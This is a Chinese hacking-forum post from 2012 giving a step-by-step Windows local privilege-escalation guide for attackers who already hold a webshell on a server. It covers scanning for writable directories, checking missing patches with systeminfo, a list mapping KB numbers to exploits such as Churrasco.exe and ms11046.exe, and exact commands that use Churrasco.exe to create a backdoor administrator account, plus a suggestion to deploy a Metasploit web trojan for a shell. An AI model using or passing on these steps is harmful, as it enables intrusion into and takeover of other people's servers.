切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
286 windows提权的基本内容---本地溢出提权[复制链接]
发表于 2012-10-7 21:58:13 | 显示全部楼层 |!read_mode!
首先得用 wt.asp 查找可写目录


输入路径,把我附上的目录填进去或者你们自己收集的目录字典填写上去。
扫描完毕后,看到蓝色的目录,尝试传我们的 exploit 和 cmd 等文件来提权。


接着在 webshell 上点 cmd 命令执行,填写刚才 shell 上传的,勾上 WScript.Shell(有时候可以不
选,看有没有默认的 cmd 组件有没有开启或者删除.) 下面那里输入命令 ver 看看能否执行.


现在是 users 权限暂时不能执行 net user xxx xxx /add 来添加命令.我们可以通过 systeminfo 来
获取这台服务器的一些补丁信息神马的


没有补丁.
附上一些补丁信息
KB2360937 MS10-084
KB2478960 MS11-014
KB2507938 MS11-056
KB2566454 MS11-062
KB2646524 MS12-003
KB2645640 MS12-009
KB2641653 MS12-018
KB952004 MS09-012 Pr.exe
KB956572 MS09-012 巴西烤肉(Churrasco.exe)
KB971657 MS09-041
KB2620712 MS11-097
KB2393802 MS11-011 ms11011.exe
KB942831 MS08-005
KB2503665 MS11-046 ms11046.exe
KB2592799 MS11-080 ms11080.exe
直接传 exploit 吧,


""C:\Documents and Settings\All Users\Documents\My Music\Sync
Playlists\0012F872\Churrasco.exe" "net user helen fuckhelen /add" //创建 helen 账号 密码
fuckhelen
""C:\Documents and Settings\All Users\Documents\My Music\Sync
Playlists\0012F872\Churrasco.exe" "net localgroup administrators helen /add" 把 helen 提升到
administrators.
通过执行 exploit 我们从 user 权限提升到 system,直接创建系统账号吧.
Ps:这里涉及一个关于 windows 里面短文件的 xx,由于文件夹里带空格不能在命令行里直接执
行 , 要 用 ”” 双 引 号 来 包 含 . 如 果 你 上 传 exploit 是 在 C:\recycler 的 话 就
C:\recycler\Churrasco.exe “net user helen fuckhelen /add”
如果有命令执行权限,你可以直接用 metasploit 生成一个网马(前提是没打浏览器补丁),上传
cmd 后,在命令输入里填写 start 网马地址 ,溢出后你直接获得了这台机子的 cmdshell 了。



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-20 12:03

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部